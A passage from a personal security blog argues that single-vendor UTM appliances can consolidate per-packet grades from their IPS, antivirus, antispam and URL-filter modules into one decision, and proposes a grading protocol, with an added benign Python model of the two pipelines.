The solution is being put forward today by one or two vendors that have come to realize that if they write their own antivirus, they can manipulate it; if the IPS code is their proprietary code, they can manipulate it; and where the URL filter is a service they own, modifications and alterations can be performed. The main point is that if you are the sole vendor for all the modules inside your UTM device, you can make them speak to each other, you can take access control decisions based on the blended results of the traffic that passes through your device, and, because of stateful technologies, you can understand the deep behavior of your traffic, and so have access control decisions made by the deepest analysis available.

By creating a single-vendor solution, one is able to interconnect the different security modules and create a real UTM device. In my terms, "Real UTM" applies only if the device and the different modules come from the same vendor, so it can sanitize the traffic using decisions based on a matrix check of each packet.

The following diagram (D01) shows how a current-concept UTM device actually passes the traffic:

In current UTM environments, the packet actually has to go through each and every module as a stage of inspection. What may happen is that one module is not certain whether the packet contains an attack, so it does not mark it as an attack and passes it on. The attack will pass between the different "Best of Breed" modules and no decision will be taken to drop the packet, because no module found a specific attack in its own mechanism, and even if one did, it would not be able to tell the following module about it, because of the different technologies and vendor code confidentiality.

The following diagram (D02) shows exactly what happens to a packet that runs through what is considered a real UTM:

What is clearly visible from this diagram is that a packet running through a real UTM mechanism also runs through each and every one of the modules. Note: if a packet is intercepted by the IPS mechanism, it will ask the antivirus to check it too, and so on for the AntiSpam and every other UTM module. Later on, the UTM mechanism will decide, based on the scan checks from all of the modules, whether to pass the packet on or to drop it. It is not session based, but packet based.

Now, what happens in that environment is that each module can give some kind of grade to the packet, even if it is not sure it is an attack. Next, the UTM consolidation engine can grade the packet based on all of the modules and make a sophisticated decision to drop or accept the packet, and that is after a real deep inspection.

A new UTM RFC/Protocol is required.

One cannot expect major vendors to exchange code parts between them, but maybe some kind of consolidation protocol is needed here. We had ICAP in the past to check different traffic methods; maybe now is the time to write a new protocol by which inspection modules could grade traffic, so that a consolidated decision could be made.
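The grading and consolidation described for D02, and the grade exchange proposed just above, as an added example that is not part of the original post: a small Python model contrasts a D01 chain, where each best-of-breed module decides alone and an uncertain finding is lost at the hand-off, with a D02 engine that collects a grade from every module and decides once. The module names follow the post; the grades, the certainty cutoff, the threshold and the sample packets are assumed values constructed for illustration.

```python
# Added example, not from the original post: a toy model of the two packet
# pipelines described above.  Module names follow the post; the grades,
# the certainty cutoff, the threshold and the sample packets are constructed.

MODULES = ("firewall", "ips", "antivirus", "antispam", "urlfilter")
CERTAIN = 0.9  # a module drops on its own only above this grade (assumed)


def best_of_breed_chain(grades):
    """D01: modules run one after another and each decides alone.  A grade
    below CERTAIN is forgotten when the packet is handed to the next module,
    so several 'suspicious but not sure' findings never add up."""
    for module in MODULES:
        if grades.get(module, 0.0) >= CERTAIN:
            return ("drop", module)
    return ("accept", None)


def consolidated_engine(grades, threshold=1.2):
    """D02: every module grades the packet, then one consolidation engine
    decides on the combined evidence.  Summing grades is a deliberately simple
    combination rule; the threshold is an assumed tuning value."""
    total = round(sum(grades.get(m, 0.0) for m in MODULES), 2)
    return ("drop" if total >= threshold else "accept", total)


# Constructed sample packets: module -> grade (0.0 clean, 1.0 certainly bad).
SAMPLE_PACKETS = {
    # Ordinary HTTP: every module is comfortable.
    "clean_http": {"firewall": 0.0, "ips": 0.1, "antivirus": 0.0,
                   "antispam": 0.05, "urlfilter": 0.0},
    # Known virus: the antivirus module alone is certain.
    "known_virus": {"firewall": 0.0, "ips": 0.2, "antivirus": 0.95,
                    "antispam": 0.0, "urlfilter": 0.1},
    # Blended traffic as in the post: exploit-like payload (IPS unsure),
    # heuristic AV hit, spam-like content, odd URL.  No module is certain.
    "blended": {"firewall": 0.1, "ips": 0.5, "antivirus": 0.6,
                "antispam": 0.3, "urlfilter": 0.2},
}


def compare_pipelines(packets=SAMPLE_PACKETS):
    """Run both pipelines over the samples; returns name -> (D01, D02)."""
    return {name: (best_of_breed_chain(g), consolidated_engine(g))
            for name, g in packets.items()}


if __name__ == "__main__":
    for name, (chain, consolidated) in compare_pipelines().items():
        print(f"{name:12} chain={chain}  consolidated={consolidated}")
```

The blended sample is the case the post argues about: the chain accepts it because no single module reaches its own certainty cutoff, while the consolidated engine drops it on the combined grades.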

In conclusion, the UTM world is a wonderful and insightful world; the best of the vendors are making a great effort to give us best-practice results and the solutions we require. But because of the misleading assumption that "attacks may be more sophisticated but they still spread in the same ways", the UTM world will not be complete. The concept should be: "an attack can come in different ways and blended ways; check them all and never skip a phase".

About

    My name is Barry Shteiman, I'm a devoted tech junkie, and this is my blog.
    E: barry.shteiman -at- gmail.com
    Twitter : bshteiman